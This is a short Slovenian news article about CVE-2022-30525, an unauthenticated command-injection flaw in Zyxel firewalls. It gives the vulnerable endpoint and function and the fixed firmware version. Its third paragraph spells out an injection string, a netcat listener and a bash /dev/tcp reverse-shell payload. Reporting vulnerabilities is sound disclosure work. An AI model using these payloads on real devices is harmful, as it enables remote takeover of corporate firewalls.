Ranljivost v požarnih zidovih Zyxel, ki omogoča izvajanje kode brez avtentikacije

V napravah Zyxel serije ATP, VPN in USG FLEX, namenjenih organiziranju delovanja požarnih zidov, IDS in VPN v podjetjih, je bila ugotovljena kritična ranljivost (CVE-2022-30525), ki zunanjemu napadalcu omogoča izvajanje kode na naprava brez uporabniških pravic brez avtentikacije. Za izvedbo napada mora biti napadalec sposoben pošiljati zahteve napravi z uporabo protokola HTTP/HTTPS. Zyxel je odpravil ranljivost v posodobitvi strojne programske opreme ZLD 5.30. Po podatkih storitve Shodan je trenutno v globalnem omrežju 16213 potencialno ranljivih naprav, ki sprejemajo zahteve prek HTTP/HTTPS.

Delovanje poteka s pošiljanjem posebej oblikovanih ukazov spletnemu upravljalniku /ztp/cgi-bin/handler, ki je dostopen brez avtentikacije. Težavo povzroča pomanjkanje ustreznega čiščenja parametrov zahteve pri izvajanju ukazov v sistemu z uporabo klica os.system, ki se uporablja v knjižnici lib_wan_settings.py in se izvaja pri obdelavi operacije setWanPortSt.

Napadalec bi lahko na primer posredoval niz »; ping 192.168.1.210;" kar bo vodilo do izvedbe ukaza “ping 192.168.1.210” v sistemu. Če želite pridobiti dostop do ukazne lupine, lahko v sistemu zaženete »nc -lvnp 1270« in nato sprožite povratno povezavo tako, da pošljete zahtevo napravi z ukazom '; bash -c \»exec bash -i &>/dev/tcp/192.168.1.210/1270 <&1;\»;’.

Vir: opennet.ru

Dodaj komentar